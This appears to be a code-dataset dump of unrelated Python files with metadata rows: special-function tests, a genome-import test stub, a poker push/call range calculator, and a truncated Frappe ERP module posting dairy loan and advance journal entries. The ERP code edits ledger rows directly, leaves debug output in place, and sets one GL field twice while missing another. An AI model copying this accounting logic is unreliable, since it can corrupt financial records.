npt.assert_almost_equal(alpha1, beta, decimal=5)
alpha2 = sf.gammaq(np.ones(4), np.asarray([0, 0.1 ,0.5, 1]))
npt.assert_almost_equal(alpha2, beta, decimal=5)
alpha3 = sf.gammaq(np.ones(4).reshape(1, -1), np.asarray([[0, 0.1 ,0.5, 1]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=5)
################################################################################
# Error Function
def test_erf():
"""
erf
"""
alpha1 = [sf.erf(i) for i in [-10, 5, 0, 5, 10]]
beta = [special.erf(i) for i in [-10, 5, 0, 5, 10]]
npt.assert_almost_equal(alpha1, beta, decimal=3)
alpha2 = sf.erf(np.asarray([-10, 5, 0, 5, 10]))
npt.assert_almost_equal(alpha2, beta, decimal=3)
alpha3 = sf.erf(np.asarray([[-10, 5, 0, 5, 10]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=3)
def test_erfc():
"""
erfc
"""
alpha1 = [sf.erfc(i) for i in [-10, 5, 0, 5, 10]]
beta = [special.erfc(i) for i in [-10, 5, 0, 5, 10]]
npt.assert_almost_equal(alpha1, beta, decimal=3)
alpha2 = sf.erfc(np.asarray([-10, 5, 0, 5, 10]))
npt.assert_almost_equal(alpha2, beta, decimal=3)
alpha3 = sf.erfc(np.asarray([[-10, 5, 0, 5, 10]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=3)
def test_erfcc():
"""
erfcc
"""
alpha1 = [sf.erfcc(i) for i in [-10, 5, 0, 5, 10]]
beta = [special.erfc(i) for i in [-10, 5, 0, 5, 10]]
npt.assert_almost_equal(alpha1, beta, decimal=-1)
alpha2 = sf.erfcc(np.asarray([-10, 5, 0, 5, 10]))
npt.assert_almost_equal(alpha2, beta, decimal=-1)
alpha3 = sf.erfcc(np.asarray([[-10, 5, 0, 5, 10]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=-1)
def test_inverfc():
"""
inverfc
"""
alpha1 = [sf.inverfc(i) for i in [0.1, 0.3, 0.5, 0.6, 1.0]]
beta = [special.erfcinv(i) for i in [0.1, 0.3, 0.5, 0.6, 1.0]]
npt.assert_almost_equal(alpha1, beta, decimal=3)
alpha2 = sf.inverfc(np.asarray([0.1, 0.3, 0.5, 0.6, 1.0]))
npt.assert_almost_equal(alpha2, beta, decimal=3)
alpha3 = sf.inverfc(np.asarray([[0.1, 0.3, 0.5, 0.6, 1.0]]))
npt.assert_almost_equal(alpha3[0, :], beta, decimal=3)
################################################################################
| 30.227941
| 81
| 0.559231
| 696
| 4,111
| 3.221264
| 0.074713
| 0.024978
| 0.160571
| 0.214095
| 0.821142
| 0.810437
| 0.804193
| 0.804193
| 0.804193
| 0.772971
| 0
| 0.113424
| 0.193627
| 4,111
| 135
| 82
| 30.451852
| 0.562896
| 0.019703
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.347826
| 1
| 0.115942
| false
| 0
| 0.072464
| 0
| 0.188406
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f9046ed3759847debf179da2f2ee5ab16f055ff0
| 216
|
py
|
Python
|
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | null | null | null |
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | 17
|
2019-07-15T16:55:22.000Z
|
2021-11-02T18:49:56.000Z
|
src/modelseed/test/test_import_genome.py
|
jayrbolton/arangodb_biochem_importer
|
b1c3eb16908ce47bf4c0b2ed792262612b6a019b
|
[
"MIT"
] | 6
|
2019-08-05T17:02:22.000Z
|
2021-05-13T15:52:11.000Z
|
import unittest
# from arangodb_biochem_importer.import_genome import import_genome
class TestImportGenome(unittest.TestCase):
def test_basic_download(self):
pass
# import_genome('32952/30/1')
| 21.6
| 67
| 0.75463
| 26
| 216
| 6
| 0.730769
| 0.230769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044693
| 0.171296
| 216
| 9
| 68
| 24
| 0.826816
| 0.430556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f913ecb6b8966bffbd0f7c27e7c9d079325ccaaa
| 5,443
|
py
|
Python
|
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | null | null | null |
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | 8
|
2020-04-24T08:11:54.000Z
|
2022-02-10T01:21:56.000Z
|
sample_player/tools/metrics.py
|
benoitRodde/DeepPoker
|
1f5336246324d97bb915373b1a05f30be38c5126
|
[
"MIT"
] | 1
|
2020-08-27T15:44:25.000Z
|
2020-08-27T15:44:25.000Z
|
import numpy as np
def compute_nash_pusher(model):
matrix = np.zeros((13, 13))
print("computing pusher ranges")
print("\tpocket pairs")
# pocket pairs
for i in range(13):
cards = np.zeros(13)
cards[12-i] = 1
suited = 0
sb = 1
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
matrix[i][i] = starting_stack_bb
# suited
for i in range(13):
for j in range(13):
# not pocket pairs
if j != i:
cards = np.zeros(13)
cards[12-i] = 1
cards[12-j] = 1
suited = 1
sb = 1
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
if j > i:
matrix[i][j] = starting_stack_bb
else:
matrix[j][i] = starting_stack_bb
# offsuit
for i in range(13):
for j in range(13):
# not pocket pairs
if j != i:
cards = np.zeros(13)
cards[12-i] = 1
cards[12-j] = 1
suited = 0
sb = 1
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
if j < i:
matrix[i][j] = starting_stack_bb
else:
matrix[j][i] = starting_stack_bb
return matrix
def compute_nash_caller(model):
matrix = np.zeros((13, 13))
print("computing caller ranges")
print("\tpocket pairs")
# pocket pairs
for i in range(13):
cards = np.zeros(13)
cards[12-i] = 1
suited = 0
sb = 0
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
matrix[i][i] = starting_stack_bb
# suited
for i in range(13):
for j in range(13):
# not pocket pairs
if j != i:
cards = np.zeros(13)
cards[12-i] = 1
cards[12-j] = 1
suited = 1
sb = 0
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
if j > i:
matrix[i][j] = starting_stack_bb
else:
matrix[j][i] = starting_stack_bb
# offsuit
for i in range(13):
for j in range(13):
# not pocket pairs
if j != i:
cards = np.zeros(13)
cards[12-i] = 1
cards[12-j] = 1
suited = 0
sb = 0
starting_stack_bb = 20
push = 0
while push == 0:
feat = np.concatenate(
[cards, np.array([suited, sb, starting_stack_bb*20/400])]).reshape((1, 16))
pred = model.predict(feat)
push = np.argmax(pred)
if push == 0:
starting_stack_bb -= 0.1
if starting_stack_bb < 1:
push = 1
else:
if j < i:
matrix[i][j] = starting_stack_bb
else:
matrix[j][i] = starting_stack_bb
return matrix
| 32.39881
| 99
| 0.393717
| 582
| 5,443
| 3.558419
| 0.085911
| 0.213423
| 0.246258
| 0.098503
| 0.967648
| 0.967648
| 0.967648
| 0.967648
| 0.932883
| 0.932883
| 0
| 0.069671
| 0.51479
| 5,443
| 167
| 100
| 32.592814
| 0.714502
| 0.022598
| 0
| 0.965035
| 0
| 0
| 0.013939
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013986
| false
| 0
| 0.006993
| 0
| 0.034965
| 0.027972
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
00645eec836dff286a9c1c4cc052a6baa4e7e18c
| 37,062
|
py
|
Python
|
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | null | null | null |
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | null | null | null |
dairy_erp/dairy_erp/doctype/vlcc_payment_cycle_report/vlcc_payment_cycle_report.py
|
shrikant9867/Dairy_project_Daiyerp
|
635d34115f0eb2081b6835a190eda4971dbfb99f
|
[
"MIT"
] | 2
|
2020-01-19T13:27:57.000Z
|
2021-12-28T20:32:56.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Stellapps Technologies Private Ltd.
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe.utils import getdate
from dairy_erp.dairy_utils import make_dairy_log
from frappe import _
from frappe.utils import flt, cstr,nowdate,cint
import json
class VLCCPaymentCycleReport(Document):
def validate(self):
# only one vpcr allowed against one vlcc per cycle
if frappe.db.get_value("VLCC Payment Cycle Report",{'cycle':self.cycle,\
'vlcc_name':self.vlcc_name},'name') and self.is_new():
frappe.throw(_("VPCR has already been generated for this cycle against vlcc <b>{0}</b>".format(self.vlcc_name)))
if self.collection_to >= nowdate() :
frappe.throw(_("You can generate VPCR after <b>'{0}'</b>".format(self.collection_to)))
def before_submit(self):
try:
self.advance_operation()
self.loan_operation()
self.update_vpcr()
if float(self.incentives) != 0:
if not frappe.db.get_value("Purchase Invoice", {'cycle': self.cycle,\
'supplier': self.vlcc_name},'name'):
self.create_incentive()
frappe.msgprint(_("Purchase invoice created successfully against Incentives"))
else: frappe.msgprint(_("Purchase invoice Already created successfully against Incentives"))
except Exception,e:
frappe.db.rollback()
make_dairy_log(title="JV creation Against Advance Failed",method="make_jv", status="Error",
data = "data", message=e, traceback=frappe.get_traceback())
frappe.throw("Something Went Wrong Please check dairy log")
def update_vpcr(self):
loan_total, loan_je, adavnce_je, advance_total = 0, 0, 0, 0
for row in self.vlcc_loan_child:
company = frappe.db.get_value("Company",{'is_dairy':1},'name',as_dict=1)
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': self.vlcc_name})
loan_je += je_amt[0].get('amt')
loan_total += row.principle
for row in self.vlcc_advance_child:
company = frappe.db.get_value("Company",{'is_dairy':1},'name',as_dict=1)
je_amt = frappe.get_all("Journal Entry",fields=['ifnull(sum(total_debit), 0) as amt']\
,filters={'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': self.vlcc_name})
adavnce_je += je_amt[0].get('amt')
advance_total += row.principle
self.advance_outstanding = float(advance_total) - float(adavnce_je)
self.loan_outstanding = float(loan_total) - float(loan_je)
def advance_operation(self):
flag = False
for row in self.vlcc_advance_child:
flag = True
company = frappe.db.get_value("Company",{'is_dairy':1},'name')
dairy_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': company }, 'name')
vlcc_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
'vlcc_advance':row.adv_id,'type':'Vlcc Advance', 'company': self.vlcc_name }, 'name' )
if not dairy_je_exist:
self.validate_advance(row)
dairy_je = self.create_dairy_advance_je(row)
vlcc_je = self.create_vlcc_advance_je(row)
self.update_advance_doc(row, dairy_je)
elif dairy_je_exist:
self.update_dairy_je_for_advance(row, self.cycle, dairy_je_exist)
self.update_vlcc_je_for_advance(row, self.cycle, vlcc_je_exist)
self.update_advance_after_vpcr(row)
if flag:
frappe.msgprint(_("Journal Entries have been created successfully against Advances"))
def loan_operation(self):
flag = False
for row in self.vlcc_loan_child:
flag = True
company = frappe.db.get_value("Company",{'is_dairy':1},'name')
dairy_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': company }, 'name')
vlcc_je_exist = frappe.db.get_value("Journal Entry",{'cycle': self.cycle,\
'vlcc_advance':row.loan_id,'type':'Vlcc Loan', 'company': self.vlcc_name }, 'name' )
if not dairy_je_exist:
self.validate_loan(row)
dairy_je = self.create_dairy_loan_je(row)
vlcc_je = self.create_vlcc_loan_je(row)
self.update_loan_je(row, dairy_je)
elif dairy_je_exist:
self.update_dairy_je_for_loan(row, self.cycle, dairy_je_exist)
self.update_vlcc_je_for_loan(row, self.cycle, vlcc_je_exist)
self.update_loan_vpcr_je(row)
if flag:
frappe.msgprint(_("Journal Entries have been created successfully against Loans"))
def validate_advance(self, row):
adv_doc = frappe.get_doc("Vlcc Advance",row.adv_id)
if not row.amount:
frappe.throw(_("Please Enter amount against <b>{0}</b>".format(row.adv_id)))
if float(row.amount) > float(row.outstanding):
frappe.throw(_("Amount can not be greater than outstanding for <b>{0}</b>".format(row.adv_id)))
if (int(row.no_of_instalment) + int(adv_doc.extension)) - row.paid_instalment == 1 and \
(float(row.amount) < float(adv_doc.emi_amount) or float(row.outstanding) != float(adv_doc.emi_amount)):
frappe.throw(_("Please Use Extension for <b>{0}</b>".format(row.adv_id)))
def validate_loan(self, row):
loan_doc = frappe.get_doc("Vlcc Loan",row.loan_id)
if not row.amount:
frappe.throw(_("Please Enter amount against <b>{0}</b>".format(row.loan_id)))
if float(row.amount) > float(row.outstanding):
frappe.throw(_("Amount can not be greater than outstanding for <b>{0}</b>".format(row.loan_id)))
if (int(row.no_of_instalment) + int(loan_doc.extension)) - loan_doc.paid_instalment == 1 and \
(float(row.amount) < float(loan_doc.emi_amount) or float(row.outstanding) != float(loan_doc.emi_amount)):
frappe.throw(_("Please Use Extension <b>{0}</b>".format(row.loan_id)))
def create_si(self, row, type_, item, doc_id):
company = frappe.db.get_value("Company",{'is_dairy':1},'name')
si_doc = frappe.new_doc("Sales Invoice")
si_doc.type = type_
si_doc.posting_date = self.collection_to
si_doc.customer = self.vlcc_name
si_doc.company = company
si_doc.vlcc_advance_loan = doc_id
si_doc.cycle_ = self.cycle
si_doc.append("items",{
"item_code": item,
"qty": 1,
"rate": row.amount,
"cost_center": frappe.db.get_value("Company", company, "cost_center")
})
si_doc.flags.ignore_permissions = True
si_doc.save()
si_doc.submit()
frappe.db.set_value("Sales Invoice", si_doc.name, 'posting_date', self.collection_to)
gl_stock = frappe.db.get_value("Company", company, 'default_income_account')
gl_credit = frappe.db.get_value("Company", company, 'default_receivable_account')
frappe.db.set_value("GL Entry", {"account": gl_stock, "voucher_no": si_doc.name},\
'posting_date', self.collection_to )
frappe.db.set_value("GL Entry", {"account": gl_credit, "voucher_no": si_doc.name},\
'posting_date', self.collection_to )
return si_doc.name
def create_dairy_advance_je(self, row):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
je_doc = frappe.new_doc("Journal Entry")
je_doc.voucher_type = "Journal Entry"
je_doc.company = company.get('name')
je_doc.type = "Vlcc Advance"
je_doc.cycle = self.cycle
je_doc.reference_party = self.vlcc_name
je_doc.vlcc_advance = row.adv_id
je_doc.reference_party = self.vlcc_name
je_doc.posting_date = nowdate()
je_doc.append('accounts', {
'account': "Debtors - "+ company.get('abbr'),
'debit_in_account_currency': row.amount,
'party_type': "Customer",
'party': self.vlcc_name,
'cost_center': company.get('cost_center')
})
je_doc.append('accounts', {
'account': "Loans and Advances - "+ company.get('abbr'),
'credit_in_account_currency': row.amount,
'cost_center': company.get('cost_center')
})
je_doc.flags.ignore_permissions = True
je_doc.save()
je_doc.submit()
return je_doc.name
def create_dairy_loan_je(self, row):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
principal_interest = get_interest_amount(row.amount, row.loan_id)
je_doc = frappe.new_doc("Journal Entry")
je_doc.voucher_type = "Journal Entry"
je_doc.company = company.get('name')
je_doc.reference_party = self.vlcc_name
je_doc.type = "Vlcc Loan"
je_doc.cycle = self.cycle
je_doc.farmer_advance = row.loan_id
je_doc.reference_party = self.vlcc_name
je_doc.posting_date = nowdate()
je_doc.append('accounts', {
'account': "Debtors - "+ company.get('abbr'),
'party_type': "Customer",
'party': self.vlcc_name,
'debit_in_account_currency': principal_interest.get('principal') + principal_interest.get('interest'),
'cost_center': company.get('cost_center')
})
je_doc.append('accounts', {
'account': "Loans and Advances - "+ company.get('abbr'),
'credit_in_account_currency': principal_interest.get('principal'),
'cost_center': company.get('cost_center')
})
je_doc.append('accounts', {
'account': "Interest Income - "+ company.get('abbr'),
'credit_in_account_currency': principal_interest.get('interest'),
'cost_center': company.get('cost_center')
})
je_doc.flags.ignore_permissions = True
je_doc.save()
je_doc.submit()
frappe.db.set_value("Journal Entry", je_doc.name, 'posting_date', self.collection_to)
gl_stock = frappe.db.get_value("Company", company, 'default_income_account')
gl_credit = frappe.db.get_value("Company", company, 'default_receivable_account')
frappe.db.set_value("GL Entry", {"account": "Debtors - "+ company.get('abbr'), "voucher_no": je_doc.name},\
'posting_date', self.collection_to )
frappe.db.set_value("GL Entry", {"account": "Loans and Advances - "+ company.get('abbr'), "voucher_no": je_doc.name},\
'posting_date', self.collection_to )
frappe.db.set_value("GL Entry", {"account": "Interest Income - "+ company.get('abbr'), "voucher_no": je_doc.name},\
'posting_date', self.collection_to )
return je_doc.name
def create_pi(self, row, type_, item, doc_id):
company = frappe.db.get_value("Company",{'is_dairy':1},'name')
pi = frappe.new_doc("Purchase Invoice")
pi.supplier = company
pi.company = self.vlcc_name
pi.pi_type = type_
pi.cycle = self.cycle
pi.vlcc_advance_loan = doc_id
pi.append("items",
{
"item_code":item,
"qty": 1,
"rate": row.amount,
"cost_center": frappe.db.get_value("Company", company, "cost_center")
})
pi.flags.ignore_permissions = True
pi.save()
pi.submit()
def create_vlcc_advance_je(self, row):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, ['abbr','cost_center'],as_dict=1)
je_doc = frappe.new_doc("Journal Entry")
je_doc.voucher_type = "Journal Entry"
je_doc.company = self.vlcc_name
je_doc.type = "Vlcc Advance"
je_doc.cycle = self.cycle
je_doc.reference_party = company.get('name')
je_doc.vlcc_advance = row.adv_id
je_doc.posting_date = nowdate()
je_doc.append('accounts', {
'account': "Loans and Advances Payable - "+ vlcc_attr.get('abbr'),
'debit_in_account_currency': row.amount,
'cost_center': vlcc_attr.get('cost_center')
})
je_doc.append('accounts', {
'account': "Creditors - "+ vlcc_attr.get('abbr'),
'credit_in_account_currency': row.amount,
'party_type': "Supplier",
'party': company.get('name'),
'cost_center': vlcc_attr.get('cost_center')
})
je_doc.flags.ignore_permissions = True
je_doc.save()
je_doc.submit()
def create_vlcc_loan_je(self, row):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, ['abbr','cost_center'],as_dict=1)
principal_interest = get_interest_amount(row.amount, row.loan_id)
je_doc = frappe.new_doc("Journal Entry")
je_doc.voucher_type = "Journal Entry"
je_doc.company = self.vlcc_name
je_doc.type = "Vlcc Loan"
je_doc.reference_party = company.get('name')
je_doc.cycle = self.cycle
je_doc.vlcc_advance = row.loan_id
je_doc.posting_date = nowdate()
je_doc.append('accounts', {
'account': "Loans and Advances Payable - "+ vlcc_attr.get('abbr'),
'debit_in_account_currency': principal_interest.get('principal'),
'cost_center': vlcc_attr.get('cost_center')
})
je_doc.append('accounts', {
'account': "Interest Expense - "+ vlcc_attr.get('abbr'),
'debit_in_account_currency': principal_interest.get('interest'),
'cost_center': vlcc_attr.get('cost_center')
})
je_doc.append('accounts', {
'account': "Creditors - "+ vlcc_attr.get('abbr'),
'credit_in_account_currency': principal_interest.get('principal') + principal_interest.get('interest'),
'party_type': "Supplier",
'party': company.get('name'),
'cost_center': vlcc_attr.get('cost_center'),
})
je_doc.flags.ignore_permissions = True
je_doc.save()
je_doc.submit()
def update_dairy_je_for_advance(self, row, cycle, je_no):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
accounts_row_debit = frappe.db.get_value("Journal Entry Account", \
{'parent':je_no,'account':'Debtors - '+company.get('abbr')}, 'name')
accounts_row_credit = frappe.db.get_value("Journal Entry Account", \
{'parent':je_no,'account':'Loans and Advances - '+company.get('abbr')}, 'name')
# Child update
frappe.db.set_value("Journal Entry Account",{'name':accounts_row_debit, \
'account':"Debtors - "+company.get('abbr')}, 'debit_in_account_currency', row.amount)
frappe.db.set_value("Journal Entry Account",{'name':accounts_row_credit, \
'account':'Loans and Advances - '+company.get('abbr')}, 'credit_in_account_currency', row.amount)
#total credit and debit update
frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
self.update_gl_entry_dairy_advance(je_no, row.amount)
def update_vlcc_je_for_advance(self, row, cycle, je_no):
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, ['abbr','cost_center'],as_dict=1)
accounts_row_debit = frappe.db.get_value("Journal Entry Account", {'parent':je_no,"account":\
'Loans and Advances Payable - '+vlcc_attr.get('abbr')}, 'name')
accounts_row_credit = frappe.db.get_value("Journal Entry Account", {'parent':je_no,"account":\
'Creditors - '+vlcc_attr.get('abbr')}, 'name')
frappe.db.set_value("Journal Entry Account",{'name':accounts_row_debit, 'account':"Loans and Advances Payable - "+vlcc_attr.get('abbr')}, 'debit_in_account_currency', row.amount)
frappe.db.set_value("Journal Entry Account",{'name':accounts_row_credit, 'account':"Creditors - "+vlcc_attr.get('abbr')}, 'credit_in_account_currency', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
self.update_gl_entry_vlcc_advance(je_no, row.amount)
def update_dairy_je_for_loan(self, row, cycle, je_no):
principal_interest = get_interest_amount(row.amount, row.loan_id)
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr','cost_center'],as_dict=1)
accounts_credit = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Debtors - "+company.get('abbr')}, 'name')
accounts_debit_principal = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Loans and Advances - "+company.get('abbr')}, 'name')
accounts_debit_interest = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Interest Income - "+company.get('abbr')}, 'name')
frappe.db.set_value("Journal Entry Account",accounts_credit, 'debit_in_account_currency', flt(principal_interest.get('principal') + principal_interest.get('interest'),2))
frappe.db.set_value("Journal Entry Account",accounts_debit_principal, 'credit_in_account_currency', flt(principal_interest.get('principal'),2))
frappe.db.set_value("Journal Entry Account",accounts_debit_interest, 'credit_in_account_currency', flt(principal_interest.get('interest'),2))
frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
self.update_gl_entry_dairy_loan(je_no, principal_interest)
def update_vlcc_je_for_loan(self, row, cycle, je_no):
principal_interest = get_interest_amount(row.amount, row.loan_id)
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, ['abbr','cost_center'],as_dict=1)
accounts_credit = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Creditors - "+vlcc_attr.get('abbr')}, 'name')
accounts_debit_principal = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Loans and Advances Payable - "+vlcc_attr.get('abbr')}, 'name')
accounts_debit_interest = frappe.db.get_value("Journal Entry Account", {'parent':je_no,'account':"Interest Expense - "+vlcc_attr.get('abbr')}, 'name')
frappe.db.set_value("Journal Entry Account",accounts_debit_principal, 'debit_in_account_currency', principal_interest.get('principal'))
frappe.db.set_value("Journal Entry Account",accounts_debit_interest, 'debit_in_account_currency', principal_interest.get('interest'))
frappe.db.set_value("Journal Entry Account",accounts_credit, 'credit_in_account_currency', principal_interest.get('principal') + principal_interest.get('interest'))
frappe.db.set_value("Journal Entry", je_no, 'total_credit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'total_debit', row.amount)
frappe.db.set_value("Journal Entry", je_no, 'posting_date', self.collection_to)
self.update_gl_entry_vlcc_loan(je_no, principal_interest)
def update_gl_entry_dairy_advance(self, je_no, amount):
if je_no:
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr'],as_dict=1)
gl_debit = frappe.db.get_value("GL Entry", {"account": 'Loans and Advances - '+company.get('abbr'), "voucher_no": je_no},"name")
gl_credit = frappe.db.get_value("GL Entry", {"account": "Debtors - "+company.get('abbr'), "voucher_no": je_no},"name")
#For Debitors
frappe.db.set_value("GL Entry", gl_debit, "debit", 0)
frappe.db.set_value("GL Entry", gl_debit, "credit", amount)
frappe.db.set_value("GL Entry", gl_debit, "credit_in_account_currency", amount)
frappe.db.set_value("GL Entry", gl_debit, "debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit, "posting_date", self.collection_to)
#For Creditor
frappe.db.set_value("GL Entry", gl_credit, "debit", amount)
frappe.db.set_value("GL Entry", gl_credit, "credit", 0)
frappe.db.set_value("GL Entry", gl_credit, "credit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_credit, "debit_in_account_currency", amount)
frappe.db.set_value("GL Entry", gl_credit, "posting_date", self.collection_to)
#For receive pay and net payoff reports
def update_gl_entry_dairy_loan(self, je_no, principal_interest):
if je_no and principal_interest:
company = frappe.db.get_value("Company",{'is_dairy':1},['name','abbr'],as_dict=1)
gl_debit_principal = frappe.db.get_value("GL Entry", {"account": "Debtors - "+company.get('abbr'), "voucher_no": je_no},"name")
gl_credit = frappe.db.get_value("GL Entry", {"account": "Loans and Advances - "+company.get('abbr'), "voucher_no": je_no},"name")
gl_debit_interest = frappe.db.get_value("GL Entry", {"account": "Interest Income - "+company.get('abbr'), "voucher_no": je_no},"name")
total_amount = flt(principal_interest.get('principal')+principal_interest.get('interest'),2)
print gl_debit_principal,gl_credit,gl_debit_interest,total_amount,principal_interest.get('principal'),principal_interest.get('interest'),je_no
# sdfsdfdsfksfksdjfskdfjsdkf
#For Debitors
frappe.db.set_value("GL Entry", gl_debit_principal, "debit", total_amount)
frappe.db.set_value("GL Entry", gl_debit_principal, "credit", 0)
frappe.db.set_value("GL Entry", gl_debit_principal, "credit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit_principal, "debit_in_account_currency", total_amount)
frappe.db.set_value("GL Entry", gl_debit_principal,"posting_date", self.collection_to)
frappe.db.set_value("GL Entry", gl_credit, "credit", flt(principal_interest.get('principal'),2))
frappe.db.set_value("GL Entry", gl_credit, "debit", 0)
frappe.db.set_value("GL Entry", gl_credit, "credit_in_account_currency", flt(principal_interest.get('principal'),2))
frappe.db.set_value("GL Entry", gl_credit, "debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_credit,"posting_date", self.collection_to)
frappe.db.set_value("GL Entry", gl_debit_interest, "credit", flt(principal_interest.get('interest'),2))
frappe.db.set_value("GL Entry", gl_debit_interest, "debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit_interest, "credit_in_account_currency", flt(principal_interest.get('interest'),2))
frappe.db.set_value("GL Entry", gl_debit_interest, "debit_in_account_currency", 0)
frappe.db.set_value("GL Entry", gl_debit_interest, "posting_date", self.collection_to)
def update_gl_entry_vlcc_advance(self, je_no, amount):
if je_no:
vlcc_attr = frappe.db.get_value("Company", self.vlcc_name, 'abbr')
